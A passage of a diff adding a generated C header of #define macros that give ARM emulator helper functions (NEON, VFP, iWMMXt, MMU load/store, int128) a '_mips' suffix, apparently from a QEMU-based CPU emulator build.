+#define helper_iwmmxt_avgw0 helper_iwmmxt_avgw0_mips +#define helper_iwmmxt_avgw1 helper_iwmmxt_avgw1_mips +#define helper_iwmmxt_bcstb helper_iwmmxt_bcstb_mips +#define helper_iwmmxt_bcstl helper_iwmmxt_bcstl_mips +#define helper_iwmmxt_bcstw helper_iwmmxt_bcstw_mips +#define helper_iwmmxt_cmpeqb helper_iwmmxt_cmpeqb_mips +#define helper_iwmmxt_cmpeql helper_iwmmxt_cmpeql_mips +#define helper_iwmmxt_cmpeqw helper_iwmmxt_cmpeqw_mips +#define helper_iwmmxt_cmpgtsb helper_iwmmxt_cmpgtsb_mips +#define helper_iwmmxt_cmpgtsl helper_iwmmxt_cmpgtsl_mips +#define helper_iwmmxt_cmpgtsw helper_iwmmxt_cmpgtsw_mips +#define helper_iwmmxt_cmpgtub helper_iwmmxt_cmpgtub_mips +#define helper_iwmmxt_cmpgtul helper_iwmmxt_cmpgtul_mips +#define helper_iwmmxt_cmpgtuw helper_iwmmxt_cmpgtuw_mips +#define helper_iwmmxt_insr helper_iwmmxt_insr_mips +#define helper_iwmmxt_macsw helper_iwmmxt_macsw_mips +#define helper_iwmmxt_macuw helper_iwmmxt_macuw_mips +#define helper_iwmmxt_maddsq helper_iwmmxt_maddsq_mips +#define helper_iwmmxt_madduq helper_iwmmxt_madduq_mips +#define helper_iwmmxt_maxsb helper_iwmmxt_maxsb_mips +#define helper_iwmmxt_maxsl helper_iwmmxt_maxsl_mips +#define helper_iwmmxt_maxsw helper_iwmmxt_maxsw_mips +#define helper_iwmmxt_maxub helper_iwmmxt_maxub_mips +#define helper_iwmmxt_maxul helper_iwmmxt_maxul_mips +#define helper_iwmmxt_maxuw helper_iwmmxt_maxuw_mips +#define helper_iwmmxt_minsb helper_iwmmxt_minsb_mips +#define helper_iwmmxt_minsl helper_iwmmxt_minsl_mips +#define helper_iwmmxt_minsw helper_iwmmxt_minsw_mips +#define helper_iwmmxt_minub helper_iwmmxt_minub_mips +#define helper_iwmmxt_minul helper_iwmmxt_minul_mips +#define helper_iwmmxt_minuw helper_iwmmxt_minuw_mips +#define helper_iwmmxt_msbb helper_iwmmxt_msbb_mips +#define helper_iwmmxt_msbl helper_iwmmxt_msbl_mips +#define helper_iwmmxt_msbw helper_iwmmxt_msbw_mips +#define helper_iwmmxt_muladdsl helper_iwmmxt_muladdsl_mips +#define helper_iwmmxt_muladdsw helper_iwmmxt_muladdsw_mips +#define helper_iwmmxt_muladdswl helper_iwmmxt_muladdswl_mips +#define helper_iwmmxt_mulshw helper_iwmmxt_mulshw_mips +#define helper_iwmmxt_mulslw helper_iwmmxt_mulslw_mips +#define helper_iwmmxt_muluhw helper_iwmmxt_muluhw_mips +#define helper_iwmmxt_mululw helper_iwmmxt_mululw_mips +#define helper_iwmmxt_packsl helper_iwmmxt_packsl_mips +#define helper_iwmmxt_packsq helper_iwmmxt_packsq_mips +#define helper_iwmmxt_packsw helper_iwmmxt_packsw_mips +#define helper_iwmmxt_packul helper_iwmmxt_packul_mips +#define helper_iwmmxt_packuq helper_iwmmxt_packuq_mips +#define helper_iwmmxt_packuw helper_iwmmxt_packuw_mips +#define helper_iwmmxt_rorl helper_iwmmxt_rorl_mips +#define helper_iwmmxt_rorq helper_iwmmxt_rorq_mips +#define helper_iwmmxt_rorw helper_iwmmxt_rorw_mips +#define helper_iwmmxt_sadb helper_iwmmxt_sadb_mips +#define helper_iwmmxt_sadw helper_iwmmxt_sadw_mips +#define helper_iwmmxt_setpsr_nz helper_iwmmxt_setpsr_nz_mips +#define helper_iwmmxt_shufh helper_iwmmxt_shufh_mips +#define helper_iwmmxt_slll helper_iwmmxt_slll_mips +#define helper_iwmmxt_sllq helper_iwmmxt_sllq_mips +#define helper_iwmmxt_sllw helper_iwmmxt_sllw_mips +#define helper_iwmmxt_sral helper_iwmmxt_sral_mips +#define helper_iwmmxt_sraq helper_iwmmxt_sraq_mips +#define helper_iwmmxt_sraw helper_iwmmxt_sraw_mips +#define helper_iwmmxt_srll helper_iwmmxt_srll_mips +#define helper_iwmmxt_srlq helper_iwmmxt_srlq_mips +#define helper_iwmmxt_srlw helper_iwmmxt_srlw_mips +#define helper_iwmmxt_subnb helper_iwmmxt_subnb_mips +#define helper_iwmmxt_subnl helper_iwmmxt_subnl_mips +#define helper_iwmmxt_subnw helper_iwmmxt_subnw_mips +#define helper_iwmmxt_subsb helper_iwmmxt_subsb_mips +#define helper_iwmmxt_subsl helper_iwmmxt_subsl_mips +#define helper_iwmmxt_subsw helper_iwmmxt_subsw_mips +#define helper_iwmmxt_subub helper_iwmmxt_subub_mips +#define helper_iwmmxt_subul helper_iwmmxt_subul_mips +#define helper_iwmmxt_subuw helper_iwmmxt_subuw_mips +#define helper_iwmmxt_unpackhb helper_iwmmxt_unpackhb_mips +#define helper_iwmmxt_unpackhl helper_iwmmxt_unpackhl_mips +#define helper_iwmmxt_unpackhsb helper_iwmmxt_unpackhsb_mips +#define helper_iwmmxt_unpackhsl helper_iwmmxt_unpackhsl_mips +#define helper_iwmmxt_unpackhsw helper_iwmmxt_unpackhsw_mips +#define helper_iwmmxt_unpackhub helper_iwmmxt_unpackhub_mips +#define helper_iwmmxt_unpackhul helper_iwmmxt_unpackhul_mips +#define helper_iwmmxt_unpackhuw helper_iwmmxt_unpackhuw_mips +#define helper_iwmmxt_unpackhw helper_iwmmxt_unpackhw_mips +#define helper_iwmmxt_unpacklb helper_iwmmxt_unpacklb_mips +#define helper_iwmmxt_unpackll helper_iwmmxt_unpackll_mips +#define helper_iwmmxt_unpacklsb helper_iwmmxt_unpacklsb_mips +#define helper_iwmmxt_unpacklsl helper_iwmmxt_unpacklsl_mips +#define helper_iwmmxt_unpacklsw helper_iwmmxt_unpacklsw_mips +#define helper_iwmmxt_unpacklub helper_iwmmxt_unpacklub_mips +#define helper_iwmmxt_unpacklul helper_iwmmxt_unpacklul_mips +#define helper_iwmmxt_unpackluw helper_iwmmxt_unpackluw_mips +#define helper_iwmmxt_unpacklw helper_iwmmxt_unpacklw_mips +#define helper_ldb_cmmu helper_ldb_cmmu_mips +#define helper_ldb_mmu helper_ldb_mmu_mips +#define helper_ldl_cmmu helper_ldl_cmmu_mips +#define helper_ldl_mmu helper_ldl_mmu_mips +#define helper_ldq_cmmu helper_ldq_cmmu_mips +#define helper_ldq_mmu helper_ldq_mmu_mips +#define helper_ldw_cmmu helper_ldw_cmmu_mips +#define helper_ldw_mmu helper_ldw_mmu_mips +#define helper_le_ldl_cmmu helper_le_ldl_cmmu_mips +#define helper_le_ldq_cmmu helper_le_ldq_cmmu_mips +#define helper_le_ldq_mmu helper_le_ldq_mmu_mips +#define helper_le_ldsl_mmu helper_le_ldsl_mmu_mips +#define helper_le_ldsw_mmu helper_le_ldsw_mmu_mips +#define helper_le_ldul_mmu helper_le_ldul_mmu_mips +#define helper_le_lduw_mmu helper_le_lduw_mmu_mips +#define helper_le_ldw_cmmu helper_le_ldw_cmmu_mips +#define helper_le_stl_mmu helper_le_stl_mmu_mips +#define helper_le_stq_mmu helper_le_stq_mmu_mips +#define helper_le_stw_mmu helper_le_stw_mmu_mips +#define helper_msr_i_pstate helper_msr_i_pstate_mips +#define helper_neon_abd_f32 helper_neon_abd_f32_mips +#define helper_neon_abdl_s16 helper_neon_abdl_s16_mips +#define helper_neon_abdl_s32 helper_neon_abdl_s32_mips +#define helper_neon_abdl_s64 helper_neon_abdl_s64_mips +#define helper_neon_abdl_u16 helper_neon_abdl_u16_mips +#define helper_neon_abdl_u32 helper_neon_abdl_u32_mips +#define helper_neon_abdl_u64 helper_neon_abdl_u64_mips +#define helper_neon_abd_s16 helper_neon_abd_s16_mips +#define helper_neon_abd_s32 helper_neon_abd_s32_mips +#define helper_neon_abd_s8 helper_neon_abd_s8_mips +#define helper_neon_abd_u16 helper_neon_abd_u16_mips +#define helper_neon_abd_u32 helper_neon_abd_u32_mips +#define helper_neon_abd_u8 helper_neon_abd_u8_mips +#define helper_neon_abs_s16 helper_neon_abs_s16_mips +#define helper_neon_abs_s8 helper_neon_abs_s8_mips +#define helper_neon_acge_f32 helper_neon_acge_f32_mips +#define helper_neon_acge_f64 helper_neon_acge_f64_mips +#define helper_neon_acgt_f32 helper_neon_acgt_f32_mips +#define helper_neon_acgt_f64 helper_neon_acgt_f64_mips +#define helper_neon_addl_saturate_s32 helper_neon_addl_saturate_s32_mips +#define helper_neon_addl_saturate_s64 helper_neon_addl_saturate_s64_mips +#define helper_neon_addl_u16 helper_neon_addl_u16_mips +#define helper_neon_addl_u32 helper_neon_addl_u32_mips +#define helper_neon_add_u16 helper_neon_add_u16_mips +#define helper_neon_add_u8 helper_neon_add_u8_mips +#define helper_neon_ceq_f32 helper_neon_ceq_f32_mips +#define helper_neon_ceq_u16 helper_neon_ceq_u16_mips +#define helper_neon_ceq_u32 helper_neon_ceq_u32_mips +#define helper_neon_ceq_u8 helper_neon_ceq_u8_mips +#define helper_neon_cge_f32 helper_neon_cge_f32_mips +#define helper_neon_cge_s16 helper_neon_cge_s16_mips +#define helper_neon_cge_s32 helper_neon_cge_s32_mips +#define helper_neon_cge_s8 helper_neon_cge_s8_mips +#define helper_neon_cge_u16 helper_neon_cge_u16_mips +#define helper_neon_cge_u32 helper_neon_cge_u32_mips +#define helper_neon_cge_u8 helper_neon_cge_u8_mips +#define helper_neon_cgt_f32 helper_neon_cgt_f32_mips +#define helper_neon_cgt_s16 helper_neon_cgt_s16_mips +#define helper_neon_cgt_s32 helper_neon_cgt_s32_mips +#define helper_neon_cgt_s8 helper_neon_cgt_s8_mips +#define helper_neon_cgt_u16 helper_neon_cgt_u16_mips +#define helper_neon_cgt_u32 helper_neon_cgt_u32_mips +#define helper_neon_cgt_u8 helper_neon_cgt_u8_mips +#define helper_neon_cls_s16 helper_neon_cls_s16_mips +#define helper_neon_cls_s32 helper_neon_cls_s32_mips +#define helper_neon_cls_s8 helper_neon_cls_s8_mips +#define helper_neon_clz_u16 helper_neon_clz_u16_mips +#define helper_neon_clz_u8 helper_neon_clz_u8_mips +#define helper_neon_cnt_u8 helper_neon_cnt_u8_mips +#define helper_neon_fcvt_f16_to_f32 helper_neon_fcvt_f16_to_f32_mips +#define helper_neon_fcvt_f32_to_f16 helper_neon_fcvt_f32_to_f16_mips +#define helper_neon_hadd_s16 helper_neon_hadd_s16_mips +#define helper_neon_hadd_s32 helper_neon_hadd_s32_mips +#define helper_neon_hadd_s8 helper_neon_hadd_s8_mips +#define helper_neon_hadd_u16 helper_neon_hadd_u16_mips +#define helper_neon_hadd_u32 helper_neon_hadd_u32_mips +#define helper_neon_hadd_u8 helper_neon_hadd_u8_mips +#define helper_neon_hsub_s16 helper_neon_hsub_s16_mips +#define helper_neon_hsub_s32 helper_neon_hsub_s32_mips +#define helper_neon_hsub_s8 helper_neon_hsub_s8_mips +#define helper_neon_hsub_u16 helper_neon_hsub_u16_mips +#define helper_neon_hsub_u32 helper_neon_hsub_u32_mips +#define helper_neon_hsub_u8 helper_neon_hsub_u8_mips +#define helper_neon_max_s16 helper_neon_max_s16_mips +#define helper_neon_max_s32 helper_neon_max_s32_mips +#define helper_neon_max_s8 helper_neon_max_s8_mips +#define helper_neon_max_u16 helper_neon_max_u16_mips +#define helper_neon_max_u32 helper_neon_max_u32_mips +#define helper_neon_max_u8 helper_neon_max_u8_mips +#define helper_neon_min_s16 helper_neon_min_s16_mips +#define helper_neon_min_s32 helper_neon_min_s32_mips +#define helper_neon_min_s8 helper_neon_min_s8_mips +#define helper_neon_min_u16 helper_neon_min_u16_mips +#define helper_neon_min_u32 helper_neon_min_u32_mips +#define helper_neon_min_u8 helper_neon_min_u8_mips +#define helper_neon_mull_p8 helper_neon_mull_p8_mips +#define helper_neon_mull_s16 helper_neon_mull_s16_mips +#define helper_neon_mull_s8 helper_neon_mull_s8_mips +#define helper_neon_mull_u16 helper_neon_mull_u16_mips +#define helper_neon_mull_u8 helper_neon_mull_u8_mips +#define helper_neon_mul_p8 helper_neon_mul_p8_mips +#define helper_neon_mul_u16 helper_neon_mul_u16_mips +#define helper_neon_mul_u8 helper_neon_mul_u8_mips +#define helper_neon_narrow_high_u16 helper_neon_narrow_high_u16_mips +#define helper_neon_narrow_high_u8 helper_neon_narrow_high_u8_mips +#define helper_neon_narrow_round_high_u16 helper_neon_narrow_round_high_u16_mips +#define helper_neon_narrow_round_high_u8 helper_neon_narrow_round_high_u8_mips +#define helper_neon_narrow_sat_s16 helper_neon_narrow_sat_s16_mips +#define helper_neon_narrow_sat_s32 helper_neon_narrow_sat_s32_mips +#define helper_neon_narrow_sat_s8 helper_neon_narrow_sat_s8_mips +#define helper_neon_narrow_sat_u16 helper_neon_narrow_sat_u16_mips +#define helper_neon_narrow_sat_u32 helper_neon_narrow_sat_u32_mips +#define helper_neon_narrow_sat_u8 helper_neon_narrow_sat_u8_mips +#define helper_neon_narrow_u16 helper_neon_narrow_u16_mips +#define helper_neon_narrow_u8 helper_neon_narrow_u8_mips +#define helper_neon_negl_u16 helper_neon_negl_u16_mips +#define helper_neon_negl_u32 helper_neon_negl_u32_mips +#define helper_neon_paddl_u16 helper_neon_paddl_u16_mips +#define helper_neon_paddl_u32 helper_neon_paddl_u32_mips +#define helper_neon_padd_u16 helper_neon_padd_u16_mips +#define helper_neon_padd_u8 helper_neon_padd_u8_mips +#define helper_neon_pmax_s16 helper_neon_pmax_s16_mips +#define helper_neon_pmax_s8 helper_neon_pmax_s8_mips +#define helper_neon_pmax_u16 helper_neon_pmax_u16_mips +#define helper_neon_pmax_u8 helper_neon_pmax_u8_mips +#define helper_neon_pmin_s16 helper_neon_pmin_s16_mips +#define helper_neon_pmin_s8 helper_neon_pmin_s8_mips +#define helper_neon_pmin_u16 helper_neon_pmin_u16_mips +#define helper_neon_pmin_u8 helper_neon_pmin_u8_mips +#define helper_neon_pmull_64_hi helper_neon_pmull_64_hi_mips +#define helper_neon_pmull_64_lo helper_neon_pmull_64_lo_mips +#define helper_neon_qabs_s16 helper_neon_qabs_s16_mips +#define helper_neon_qabs_s32 helper_neon_qabs_s32_mips +#define helper_neon_qabs_s64 helper_neon_qabs_s64_mips +#define helper_neon_qabs_s8 helper_neon_qabs_s8_mips +#define helper_neon_qadd_s16 helper_neon_qadd_s16_mips +#define helper_neon_qadd_s32 helper_neon_qadd_s32_mips +#define helper_neon_qadd_s64 helper_neon_qadd_s64_mips +#define helper_neon_qadd_s8 helper_neon_qadd_s8_mips +#define helper_neon_qadd_u16 helper_neon_qadd_u16_mips +#define helper_neon_qadd_u32 helper_neon_qadd_u32_mips +#define helper_neon_qadd_u64 helper_neon_qadd_u64_mips +#define helper_neon_qadd_u8 helper_neon_qadd_u8_mips +#define helper_neon_qdmulh_s16 helper_neon_qdmulh_s16_mips +#define helper_neon_qdmulh_s32 helper_neon_qdmulh_s32_mips +#define helper_neon_qneg_s16 helper_neon_qneg_s16_mips +#define helper_neon_qneg_s32 helper_neon_qneg_s32_mips +#define helper_neon_qneg_s64 helper_neon_qneg_s64_mips +#define helper_neon_qneg_s8 helper_neon_qneg_s8_mips +#define helper_neon_qrdmulh_s16 helper_neon_qrdmulh_s16_mips +#define helper_neon_qrdmulh_s32 helper_neon_qrdmulh_s32_mips +#define helper_neon_qrshl_s16 helper_neon_qrshl_s16_mips +#define helper_neon_qrshl_s32 helper_neon_qrshl_s32_mips +#define helper_neon_qrshl_s64 helper_neon_qrshl_s64_mips +#define helper_neon_qrshl_s8 helper_neon_qrshl_s8_mips +#define helper_neon_qrshl_u16 helper_neon_qrshl_u16_mips +#define helper_neon_qrshl_u32 helper_neon_qrshl_u32_mips +#define helper_neon_qrshl_u64 helper_neon_qrshl_u64_mips +#define helper_neon_qrshl_u8 helper_neon_qrshl_u8_mips +#define helper_neon_qshl_s16 helper_neon_qshl_s16_mips +#define helper_neon_qshl_s32 helper_neon_qshl_s32_mips +#define helper_neon_qshl_s64 helper_neon_qshl_s64_mips +#define helper_neon_qshl_s8 helper_neon_qshl_s8_mips +#define helper_neon_qshl_u16 helper_neon_qshl_u16_mips +#define helper_neon_qshl_u32 helper_neon_qshl_u32_mips +#define helper_neon_qshl_u64 helper_neon_qshl_u64_mips +#define helper_neon_qshl_u8 helper_neon_qshl_u8_mips +#define helper_neon_qshlu_s16 helper_neon_qshlu_s16_mips +#define helper_neon_qshlu_s32 helper_neon_qshlu_s32_mips +#define helper_neon_qshlu_s64 helper_neon_qshlu_s64_mips +#define helper_neon_qshlu_s8 helper_neon_qshlu_s8_mips +#define helper_neon_qsub_s16 helper_neon_qsub_s16_mips +#define helper_neon_qsub_s32 helper_neon_qsub_s32_mips +#define helper_neon_qsub_s64 helper_neon_qsub_s64_mips +#define helper_neon_qsub_s8 helper_neon_qsub_s8_mips +#define helper_neon_qsub_u16 helper_neon_qsub_u16_mips +#define helper_neon_qsub_u32 helper_neon_qsub_u32_mips +#define helper_neon_qsub_u64 helper_neon_qsub_u64_mips +#define helper_neon_qsub_u8 helper_neon_qsub_u8_mips +#define helper_neon_qunzip16 helper_neon_qunzip16_mips +#define helper_neon_qunzip32 helper_neon_qunzip32_mips +#define helper_neon_qunzip8 helper_neon_qunzip8_mips +#define helper_neon_qzip16 helper_neon_qzip16_mips +#define helper_neon_qzip32 helper_neon_qzip32_mips +#define helper_neon_qzip8 helper_neon_qzip8_mips +#define helper_neon_rbit_u8 helper_neon_rbit_u8_mips +#define helper_neon_rhadd_s16 helper_neon_rhadd_s16_mips +#define helper_neon_rhadd_s32 helper_neon_rhadd_s32_mips +#define helper_neon_rhadd_s8 helper_neon_rhadd_s8_mips +#define helper_neon_rhadd_u16 helper_neon_rhadd_u16_mips +#define helper_neon_rhadd_u32 helper_neon_rhadd_u32_mips +#define helper_neon_rhadd_u8 helper_neon_rhadd_u8_mips +#define helper_neon_rshl_s16 helper_neon_rshl_s16_mips +#define helper_neon_rshl_s32 helper_neon_rshl_s32_mips +#define helper_neon_rshl_s64 helper_neon_rshl_s64_mips +#define helper_neon_rshl_s8 helper_neon_rshl_s8_mips +#define helper_neon_rshl_u16 helper_neon_rshl_u16_mips +#define helper_neon_rshl_u32 helper_neon_rshl_u32_mips +#define helper_neon_rshl_u64 helper_neon_rshl_u64_mips +#define helper_neon_rshl_u8 helper_neon_rshl_u8_mips +#define helper_neon_shl_s16 helper_neon_shl_s16_mips +#define helper_neon_shl_s32 helper_neon_shl_s32_mips +#define helper_neon_shl_s64 helper_neon_shl_s64_mips +#define helper_neon_shl_s8 helper_neon_shl_s8_mips +#define helper_neon_shl_u16 helper_neon_shl_u16_mips +#define helper_neon_shl_u32 helper_neon_shl_u32_mips +#define helper_neon_shl_u64 helper_neon_shl_u64_mips +#define helper_neon_shl_u8 helper_neon_shl_u8_mips +#define helper_neon_sqadd_u16 helper_neon_sqadd_u16_mips +#define helper_neon_sqadd_u32 helper_neon_sqadd_u32_mips +#define helper_neon_sqadd_u64 helper_neon_sqadd_u64_mips +#define helper_neon_sqadd_u8 helper_neon_sqadd_u8_mips +#define helper_neon_subl_u16 helper_neon_subl_u16_mips +#define helper_neon_subl_u32 helper_neon_subl_u32_mips +#define helper_neon_sub_u16 helper_neon_sub_u16_mips +#define helper_neon_sub_u8 helper_neon_sub_u8_mips +#define helper_neon_tbl helper_neon_tbl_mips +#define helper_neon_tst_u16 helper_neon_tst_u16_mips +#define helper_neon_tst_u32 helper_neon_tst_u32_mips +#define helper_neon_tst_u8 helper_neon_tst_u8_mips +#define helper_neon_unarrow_sat16 helper_neon_unarrow_sat16_mips +#define helper_neon_unarrow_sat32 helper_neon_unarrow_sat32_mips +#define helper_neon_unarrow_sat8 helper_neon_unarrow_sat8_mips +#define helper_neon_unzip16 helper_neon_unzip16_mips +#define helper_neon_unzip8 helper_neon_unzip8_mips +#define helper_neon_uqadd_s16 helper_neon_uqadd_s16_mips +#define helper_neon_uqadd_s32 helper_neon_uqadd_s32_mips +#define helper_neon_uqadd_s64 helper_neon_uqadd_s64_mips +#define helper_neon_uqadd_s8 helper_neon_uqadd_s8_mips +#define helper_neon_widen_s16 helper_neon_widen_s16_mips +#define helper_neon_widen_s8 helper_neon_widen_s8_mips +#define helper_neon_widen_u16 helper_neon_widen_u16_mips +#define helper_neon_widen_u8 helper_neon_widen_u8_mips +#define helper_neon_zip16 helper_neon_zip16_mips +#define helper_neon_zip8 helper_neon_zip8_mips +#define helper_pre_hvc helper_pre_hvc_mips +#define helper_pre_smc helper_pre_smc_mips +#define helper_qadd16 helper_qadd16_mips +#define helper_qadd8 helper_qadd8_mips +#define helper_qaddsubx helper_qaddsubx_mips +#define helper_qsub16 helper_qsub16_mips +#define helper_qsub8 helper_qsub8_mips +#define helper_qsubaddx helper_qsubaddx_mips +#define helper_rbit helper_rbit_mips +#define helper_recpe_f32 helper_recpe_f32_mips +#define helper_recpe_f64 helper_recpe_f64_mips +#define helper_recpe_u32 helper_recpe_u32_mips +#define helper_recps_f32 helper_recps_f32_mips +#define helper_ret_ldb_cmmu helper_ret_ldb_cmmu_mips +#define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_mips +#define helper_ret_ldub_mmu helper_ret_ldub_mmu_mips +#define helper_ret_stb_mmu helper_ret_stb_mmu_mips +#define helper_rintd helper_rintd_mips +#define helper_rintd_exact helper_rintd_exact_mips +#define helper_rints helper_rints_mips +#define helper_rints_exact helper_rints_exact_mips +#define helper_ror_cc helper_ror_cc_mips +#define helper_rsqrte_f32 helper_rsqrte_f32_mips +#define helper_rsqrte_f64 helper_rsqrte_f64_mips +#define helper_rsqrte_u32 helper_rsqrte_u32_mips +#define helper_rsqrts_f32 helper_rsqrts_f32_mips +#define helper_sadd16 helper_sadd16_mips +#define helper_sadd8 helper_sadd8_mips +#define helper_saddsubx helper_saddsubx_mips +#define helper_sar_cc helper_sar_cc_mips +#define helper_sdiv helper_sdiv_mips +#define helper_sel_flags helper_sel_flags_mips +#define helper_set_cp_reg helper_set_cp_reg_mips +#define helper_set_cp_reg64 helper_set_cp_reg64_mips +#define helper_set_neon_rmode helper_set_neon_rmode_mips +#define helper_set_r13_banked helper_set_r13_banked_mips +#define helper_set_rmode helper_set_rmode_mips +#define helper_set_user_reg helper_set_user_reg_mips +#define helper_shadd16 helper_shadd16_mips +#define helper_shadd8 helper_shadd8_mips +#define helper_shaddsubx helper_shaddsubx_mips +#define helper_shl_cc helper_shl_cc_mips +#define helper_shr_cc helper_shr_cc_mips +#define helper_shsub16 helper_shsub16_mips +#define helper_shsub8 helper_shsub8_mips +#define helper_shsubaddx helper_shsubaddx_mips +#define helper_ssat helper_ssat_mips +#define helper_ssat16 helper_ssat16_mips +#define helper_ssub16 helper_ssub16_mips +#define helper_ssub8 helper_ssub8_mips +#define helper_ssubaddx helper_ssubaddx_mips +#define helper_stb_mmu helper_stb_mmu_mips +#define helper_stl_mmu helper_stl_mmu_mips +#define helper_stq_mmu helper_stq_mmu_mips +#define helper_stw_mmu helper_stw_mmu_mips +#define helper_sub_saturate helper_sub_saturate_mips +#define helper_sub_usaturate helper_sub_usaturate_mips +#define helper_sxtb16 helper_sxtb16_mips +#define helper_uadd16 helper_uadd16_mips +#define helper_uadd8 helper_uadd8_mips +#define helper_uaddsubx helper_uaddsubx_mips +#define helper_udiv helper_udiv_mips +#define helper_uhadd16 helper_uhadd16_mips +#define helper_uhadd8 helper_uhadd8_mips +#define helper_uhaddsubx helper_uhaddsubx_mips +#define helper_uhsub16 helper_uhsub16_mips +#define helper_uhsub8 helper_uhsub8_mips +#define helper_uhsubaddx helper_uhsubaddx_mips +#define helper_uqadd16 helper_uqadd16_mips +#define helper_uqadd8 helper_uqadd8_mips +#define helper_uqaddsubx helper_uqaddsubx_mips +#define helper_uqsub16 helper_uqsub16_mips +#define helper_uqsub8 helper_uqsub8_mips +#define helper_uqsubaddx helper_uqsubaddx_mips +#define helper_usad8 helper_usad8_mips +#define helper_usat helper_usat_mips +#define helper_usat16 helper_usat16_mips +#define helper_usub16 helper_usub16_mips +#define helper_usub8 helper_usub8_mips +#define helper_usubaddx helper_usubaddx_mips +#define helper_uxtb16 helper_uxtb16_mips +#define helper_v7m_mrs helper_v7m_mrs_mips +#define helper_v7m_msr helper_v7m_msr_mips +#define helper_vfp_absd helper_vfp_absd_mips +#define helper_vfp_abss helper_vfp_abss_mips +#define helper_vfp_addd helper_vfp_addd_mips +#define helper_vfp_adds helper_vfp_adds_mips +#define helper_vfp_cmpd helper_vfp_cmpd_mips +#define helper_vfp_cmped helper_vfp_cmped_mips +#define helper_vfp_cmpes helper_vfp_cmpes_mips +#define helper_vfp_cmps helper_vfp_cmps_mips +#define helper_vfp_divd helper_vfp_divd_mips +#define helper_vfp_divs helper_vfp_divs_mips +#define helper_vfp_fcvtds helper_vfp_fcvtds_mips +#define helper_vfp_fcvt_f16_to_f32 helper_vfp_fcvt_f16_to_f32_mips +#define helper_vfp_fcvt_f16_to_f64 helper_vfp_fcvt_f16_to_f64_mips +#define helper_vfp_fcvt_f32_to_f16 helper_vfp_fcvt_f32_to_f16_mips +#define helper_vfp_fcvt_f64_to_f16 helper_vfp_fcvt_f64_to_f16_mips +#define helper_vfp_fcvtsd helper_vfp_fcvtsd_mips +#define helper_vfp_get_fpscr helper_vfp_get_fpscr_mips +#define helper_vfp_maxd helper_vfp_maxd_mips +#define helper_vfp_maxnumd helper_vfp_maxnumd_mips +#define helper_vfp_maxnums helper_vfp_maxnums_mips +#define helper_vfp_maxs helper_vfp_maxs_mips +#define helper_vfp_mind helper_vfp_mind_mips +#define helper_vfp_minnumd helper_vfp_minnumd_mips +#define helper_vfp_minnums helper_vfp_minnums_mips +#define helper_vfp_mins helper_vfp_mins_mips +#define helper_vfp_muladdd helper_vfp_muladdd_mips +#define helper_vfp_muladds helper_vfp_muladds_mips +#define helper_vfp_muld helper_vfp_muld_mips +#define helper_vfp_muls helper_vfp_muls_mips +#define helper_vfp_negd helper_vfp_negd_mips +#define helper_vfp_negs helper_vfp_negs_mips +#define helper_vfp_set_fpscr helper_vfp_set_fpscr_mips +#define helper_vfp_shtod helper_vfp_shtod_mips +#define helper_vfp_shtos helper_vfp_shtos_mips +#define helper_vfp_sitod helper_vfp_sitod_mips +#define helper_vfp_sitos helper_vfp_sitos_mips +#define helper_vfp_sltod helper_vfp_sltod_mips +#define helper_vfp_sltos helper_vfp_sltos_mips +#define helper_vfp_sqrtd helper_vfp_sqrtd_mips +#define helper_vfp_sqrts helper_vfp_sqrts_mips +#define helper_vfp_sqtod helper_vfp_sqtod_mips +#define helper_vfp_sqtos helper_vfp_sqtos_mips +#define helper_vfp_subd helper_vfp_subd_mips +#define helper_vfp_subs helper_vfp_subs_mips +#define helper_vfp_toshd helper_vfp_toshd_mips +#define helper_vfp_toshd_round_to_zero helper_vfp_toshd_round_to_zero_mips +#define helper_vfp_toshs helper_vfp_toshs_mips +#define helper_vfp_toshs_round_to_zero helper_vfp_toshs_round_to_zero_mips +#define helper_vfp_tosid helper_vfp_tosid_mips +#define helper_vfp_tosis helper_vfp_tosis_mips +#define helper_vfp_tosizd helper_vfp_tosizd_mips +#define helper_vfp_tosizs helper_vfp_tosizs_mips +#define helper_vfp_tosld helper_vfp_tosld_mips +#define helper_vfp_tosld_round_to_zero helper_vfp_tosld_round_to_zero_mips +#define helper_vfp_tosls helper_vfp_tosls_mips +#define helper_vfp_tosls_round_to_zero helper_vfp_tosls_round_to_zero_mips +#define helper_vfp_tosqd helper_vfp_tosqd_mips +#define helper_vfp_tosqs helper_vfp_tosqs_mips +#define helper_vfp_touhd helper_vfp_touhd_mips +#define helper_vfp_touhd_round_to_zero helper_vfp_touhd_round_to_zero_mips +#define helper_vfp_touhs helper_vfp_touhs_mips +#define helper_vfp_touhs_round_to_zero helper_vfp_touhs_round_to_zero_mips +#define helper_vfp_touid helper_vfp_touid_mips +#define helper_vfp_touis helper_vfp_touis_mips +#define helper_vfp_touizd helper_vfp_touizd_mips +#define helper_vfp_touizs helper_vfp_touizs_mips +#define helper_vfp_tould helper_vfp_tould_mips +#define helper_vfp_tould_round_to_zero helper_vfp_tould_round_to_zero_mips +#define helper_vfp_touls helper_vfp_touls_mips +#define helper_vfp_touls_round_to_zero helper_vfp_touls_round_to_zero_mips +#define helper_vfp_touqd helper_vfp_touqd_mips +#define helper_vfp_touqs helper_vfp_touqs_mips +#define helper_vfp_uhtod helper_vfp_uhtod_mips +#define helper_vfp_uhtos helper_vfp_uhtos_mips +#define helper_vfp_uitod helper_vfp_uitod_mips +#define helper_vfp_uitos helper_vfp_uitos_mips +#define helper_vfp_ultod helper_vfp_ultod_mips +#define helper_vfp_ultos helper_vfp_ultos_mips +#define helper_vfp_uqtod helper_vfp_uqtod_mips +#define helper_vfp_uqtos helper_vfp_uqtos_mips +#define helper_wfe helper_wfe_mips +#define helper_wfi helper_wfi_mips +#define hex2decimal hex2decimal_mips +#define hw_breakpoint_update hw_breakpoint_update_mips +#define hw_breakpoint_update_all hw_breakpoint_update_all_mips +#define hw_watchpoint_update hw_watchpoint_update_mips +#define hw_watchpoint_update_all hw_watchpoint_update_all_mips +#define _init _init_mips +#define init_cpreg_list init_cpreg_list_mips +#define init_lists init_lists_mips +#define input_type_enum input_type_enum_mips +#define int128_2_64 int128_2_64_mips +#define int128_add int128_add_mips +#define int128_addto int128_addto_mips +#define int128_and int128_and_mips +#define int128_eq int128_eq_mips +#define int128_ge int128_ge_mips +#define int128_get64 int128_get64_mips +#define int128_gt int128_gt_mips +#define int128_le int128_le_mips +#define int128_lt int128_lt_mips +#define int128_make64 int128_make64_mips +#define int128_max int128_max_mips +#define int128_min int128_min_mips +#define int128_ne int128_ne_mips +#define int128_neg int128_neg_mips +#define int128_nz int128_nz_mips +#define int128_rshift int128_rshift_mips +#define 